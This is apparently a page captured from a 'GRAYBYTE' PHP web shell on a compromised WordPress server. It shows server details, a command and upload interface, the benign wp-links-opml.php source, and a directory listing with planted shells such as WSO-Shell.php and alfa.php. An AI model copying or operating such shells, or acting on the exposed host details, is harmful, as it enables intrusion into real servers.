GRAYBYTE WORDPRESS FILE MANAGER7387

Server IP : 3.104.188.249 / Your IP : 216.73.217.141
System : Linux ip-172-26-1-242 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
PHP Version : 8.3.31
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : ON | Pkexec : OFF
Directory : /var/www/html/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /var/www/html//wp-links-opml.php
<?php
/**
 * Outputs the OPML XML format for getting the links defined in the link
 * administration. This can be used to export links from one blog over to
 * another. Links aren't exported by the WordPress export, so this file handles
 * that.
 *
 * This file is not added by default to WordPress theme pages when outputting
 * feed links. It will have to be added manually for browsers and users to pick
 * up that this file exists.
 *
 * @package WordPress
 */

require_once __DIR__ . '/wp-load.php';

header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true );
$link_cat = '';
if ( ! empty( $_GET['link_cat'] ) ) {
	$link_cat = $_GET['link_cat'];
	if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) {
		$link_cat = absint( urldecode( $link_cat ) );
	}
}

echo '<?xml version="1.0"?' . ">\n";
?>
<opml version="1.0">
	<head>
		<title>
		<?php
			/* translators: %s: Site title. */
			printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) );
		?>
		</title>
		<dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated>
		<?php
		/**
		 * Fires in the OPML header.
		 *
		 * @since 3.0.0
		 */
		do_action( 'opml_head' );
		?>
	</head>
	<body>
<?php
if ( empty( $link_cat ) ) {
	$cats = get_categories(
		array(
			'taxonomy'     => 'link_category',
			'hierarchical' => 0,
		)
	);
} else {
	$cats = get_categories(
		array(
			'taxonomy'     => 'link_category',
			'hierarchical' => 0,
			'include'      => $link_cat,
		)
	);
}

foreach ( (array) $cats as $cat ) :
	/** This filter is documented in wp-includes/bookmark-template.php */
	$catname = apply_filters( 'link_category', $cat->name );

	?>
<outline type="category" title="<?php echo esc_attr( $catname ); ?>">
	<?php
	$bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) );
	foreach ( (array) $bookmarks as $bookmark ) :
		/**
		 * Filters the OPML outline link title text.
		 *
		 * @since 2.2.0
		 *
		 * @param string $title The OPML outline title text.
		 */
		$title = apply_filters( 'link_title', $bookmark->link_name );
		?>
<outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated="
							<?php
							if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) {
								echo $bookmark->link_updated;
							}
							?>
" />
		<?php
	endforeach; // $bookmarks
	?>
</outline>
	<?php
endforeach; // $cats
?>
</body>
</opml>

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
June 10 2026 03:26:40
admin / www-data
2775
.sshbypass_logs
--
June 10 2026 17:54:31
www-data / www-data
2700
.tmb
--
June 04 2026 19:23:20
www-data / www-data
0755
images
--
June 10 2026 17:11:41
www-data / www-data
0755
phpmyadmin
--
May 27 2026 03:19:02
root / root
0755
wp-admin
--
June 04 2026 19:23:20
www-data / www-data
2775
wp-content
--
June 10 2026 17:10:50
www-data / www-data
2777
wp-includes
--
June 04 2026 19:23:20
www-data / www-data
2775
.cache.php
1.216 KB
June 10 2026 11:21:29
www-data / www-data
0644
.htaccess
1.997 KB
June 10 2026 17:14:58
www-data / www-data
0444
.passwd
0.059 KB
June 10 2026 17:51:44
www-data / www-data
0644
WSO-Shell.php
207.822 KB
June 10 2026 19:18:50
www-data / www-data
0644
admin.php
42.09 KB
June 10 2026 17:50:37
www-data / www-data
0644
alfa.php
446.542 KB
June 10 2026 17:55:04
www-data / www-data
0755
index.php
22.958 KB
June 04 2026 19:19:37
www-data / www-data
0444
license.txt
19.437 KB
May 27 2026 03:19:33
www-data / www-data
0664
readme.html
7.232 KB
May 27 2026 03:19:33
www-data / www-data
0664
robots.txt
0.074 KB
June 04 2026 19:19:38
www-data / www-data
0644
unzipper.php
11.986 KB
June 10 2026 17:17:47
www-data / www-data
0644
wp-activate.php
11.986 KB
June 10 2026 17:19:08
www-data / www-data
0664
wp-blog-header.php
0.447 KB
June 04 2026 19:19:38
www-data / www-data
0664
wp-comments-post.php
2.269 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-config-sample.php
1.16 KB
June 10 2026 11:22:00
www-data / www-data
0664
wp-config.php
4.182 KB
June 10 2026 03:26:40
www-data / www-data
0644
wp-cron.php
5.485 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-links-opml.php
2.435 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-load.php
3.941 KB
June 04 2026 19:19:38
www-data / www-data
0664
wp-login.php
50.635 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-mail.php
8.522 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-settings.php
18.581 KB
June 10 2026 17:12:51
www-data / www-data
0664
wp-signup.php
33.81 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-trackback.php
5.092 KB
May 27 2026 03:19:33
www-data / www-data
0664
xmlrpc.php
3.13 KB
May 27 2026 03:19:33
www-data / www-data
0664

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF